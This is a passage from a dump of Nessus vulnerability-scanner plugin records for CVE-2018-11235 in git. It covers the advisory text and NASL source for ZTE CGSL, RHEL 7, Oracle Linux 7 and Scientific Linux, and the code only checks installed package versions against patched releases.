or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL CORE 5.04\": [\n \"emacs-git-1.8.3.1-14.el7_5\",\n \"emacs-git-el-1.8.3.1-14.el7_5\",\n \"git-1.8.3.1-14.el7_5\",\n \"git-all-1.8.3.1-14.el7_5\",\n \"git-bzr-1.8.3.1-14.el7_5\",\n \"git-cvs-1.8.3.1-14.el7_5\",\n \"git-daemon-1.8.3.1-14.el7_5\",\n \"git-debuginfo-1.8.3.1-14.el7_5\",\n \"git-email-1.8.3.1-14.el7_5\",\n \"git-gui-1.8.3.1-14.el7_5\",\n \"git-hg-1.8.3.1-14.el7_5\",\n \"git-p4-1.8.3.1-14.el7_5\",\n \"git-svn-1.8.3.1-14.el7_5\",\n \"gitk-1.8.3.1-14.el7_5\",\n \"gitweb-1.8.3.1-14.el7_5\",\n \"perl-Git-1.8.3.1-14.el7_5\",\n \"perl-Git-SVN-1.8.3.1-14.el7_5\"\n ],\n \"CGSL MAIN 5.04\": [\n \"emacs-git-1.8.3.1-14.el7_5\",\n \"emacs-git-el-1.8.3.1-14.el7_5\",\n \"git-1.8.3.1-14.el7_5\",\n \"git-all-1.8.3.1-14.el7_5\",\n \"git-bzr-1.8.3.1-14.el7_5\",\n \"git-cvs-1.8.3.1-14.el7_5\",\n \"git-daemon-1.8.3.1-14.el7_5\",\n \"git-debuginfo-1.8.3.1-14.el7_5\",\n \"git-email-1.8.3.1-14.el7_5\",\n \"git-gui-1.8.3.1-14.el7_5\",\n 
\"git-hg-1.8.3.1-14.el7_5\",\n \"git-p4-1.8.3.1-14.el7_5\",\n \"git-svn-1.8.3.1-14.el7_5\",\n \"gitk-1.8.3.1-14.el7_5\",\n \"gitweb-1.8.3.1-14.el7_5\",\n \"perl-Git-1.8.3.1-14.el7_5\",\n \"perl-Git-SVN-1.8.3.1-14.el7_5\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:00", "description": "An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. 
This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-21T00:00:00", "type": "nessus", "title": "RHEL 7 : git (RHSA-2018:1957)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:emacs-git", "p-cpe:/a:redhat:enterprise_linux:emacs-git-el", "p-cpe:/a:redhat:enterprise_linux:git", "p-cpe:/a:redhat:enterprise_linux:git-all", "p-cpe:/a:redhat:enterprise_linux:git-bzr", "p-cpe:/a:redhat:enterprise_linux:git-cvs", "p-cpe:/a:redhat:enterprise_linux:git-daemon", "p-cpe:/a:redhat:enterprise_linux:git-debuginfo", "p-cpe:/a:redhat:enterprise_linux:git-email", "p-cpe:/a:redhat:enterprise_linux:git-gui", "p-cpe:/a:redhat:enterprise_linux:git-hg", "p-cpe:/a:redhat:enterprise_linux:git-p4", "p-cpe:/a:redhat:enterprise_linux:git-svn", "p-cpe:/a:redhat:enterprise_linux:gitk", "p-cpe:/a:redhat:enterprise_linux:gitweb", "p-cpe:/a:redhat:enterprise_linux:perl-Git", "p-cpe:/a:redhat:enterprise_linux:perl-Git-SVN", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2018-1957.NASL", "href": "https://www.tenable.com/plugins/nessus/110632", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory 
RHSA-2018:1957. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110632);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/10/24 15:35:45\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"RHSA\", value:\"2018:1957\");\n\n script_name(english:\"RHEL 7 : git (RHSA-2018:1957)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git\nrepository is an exact copy with complete revision history. 
This not\nonly allows the user to work on and contribute to projects without the\nneed to have permission to push the changes to their official\nrepositories, but also makes it possible for the user to work with no\nnetwork connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious\nrepository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:1957\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-11235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1957\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"emacs-git-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"emacs-git-el-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-1.8.3.1-14.el7_5\")) flag++;\n\n if 
(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-all-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-bzr-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-cvs-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-daemon-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-debuginfo-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-debuginfo-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-email-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-gui-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-hg-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-p4-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-svn-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"gitk-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"gitweb-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"perl-Git-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"perl-Git-SVN-1.8.3.1-14.el7_5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / 
git / git-all / git-bzr / git-cvs / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T13:16:39", "description": "From Red Hat Security Advisory 2018:1957 :\n\nAn update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-21T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : git (ELSA-2018-1957)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-09-27T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:emacs-git", "p-cpe:/a:oracle:linux:emacs-git-el", "p-cpe:/a:oracle:linux:git", "p-cpe:/a:oracle:linux:git-all", "p-cpe:/a:oracle:linux:git-bzr", "p-cpe:/a:oracle:linux:git-cvs", "p-cpe:/a:oracle:linux:git-daemon", "p-cpe:/a:oracle:linux:git-email", "p-cpe:/a:oracle:linux:git-gui", "p-cpe:/a:oracle:linux:git-hg", 
"p-cpe:/a:oracle:linux:git-p4", "p-cpe:/a:oracle:linux:git-svn", "p-cpe:/a:oracle:linux:gitk", "p-cpe:/a:oracle:linux:gitweb", "p-cpe:/a:oracle:linux:perl-Git", "p-cpe:/a:oracle:linux:perl-Git-SVN", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2018-1957.NASL", "href": "https://www.tenable.com/plugins/nessus/110629", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:1957 and \n# Oracle Linux Security Advisory ELSA-2018-1957 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110629);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"RHSA\", value:\"2018:1957\");\n\n script_name(english:\"Oracle Linux 7 : git (ELSA-2018-1957)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2018:1957 :\n\nAn update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git\nrepository is an exact copy with complete revision history. 
This not\nonly allows the user to work on and contribute to projects without the\nneed to have permission to push the changes to their official\nrepositories, but also makes it possible for the user to work with no\nnetwork connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious\nrepository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-June/007796.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-email\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"emacs-git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"emacs-git-el-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-all-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-bzr-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", 
reference:\"git-cvs-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-email-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-gui-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-hg-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-p4-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"gitk-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"gitweb-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perl-Git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perl-Git-SVN-1.8.3.1-14.el7_5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:03", "description": "Security Fix(es) :\n\n - git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : git on SL7.x x86_64 (20180620)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2020-02-24T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:emacs-git", 
"p-cpe:/a:fermilab:scientific_linux:emacs-git-el", "p-cpe:/a:fermilab:scientific_linux:git", "p-cpe:/a:fermilab:scientific_linux:git-all", "p-cpe:/a:fermilab:scientific_linux:git-bzr", "p-cpe:/a:fermilab:scientific_linux:git-cvs", "p-cpe:/a:fermilab:scientific_linux:git-daemon", "p-cpe:/a:fermilab:scientific_linux:git-debuginfo", "p-cpe:/a:fermilab:scientific_linux:git-email", "p-cpe:/a:fermilab:scientific_linux:git-gui", "p-cpe:/a:fermilab:scientific_linux:git-hg", "p-cpe:/a:fermilab:scientific_linux:git-p4", "p-cpe:/a:fermilab:scientific_linux:git-svn", "p-cpe:/a:fermilab:scientific_linux:gitk", "p-cpe:/a:fermilab:scientific_linux:gitweb", "p-cpe:/a:fermilab:scientific_linux:perl-Git", "p-cpe:/a:fermilab:scientific_linux:perl-Git-SVN", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20180620_GIT_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/110655", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110655);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-11235\");\n\n script_name(english:\"Scientific Linux Security Update : git on SL7.x x86_64 (20180620)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - git: arbitrary code execution when recursively cloning a\n malicious repository (CVE-2018-11235)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1806&L=scientific-linux-errata&F=&S=&P=4272\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?30778cae\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected 
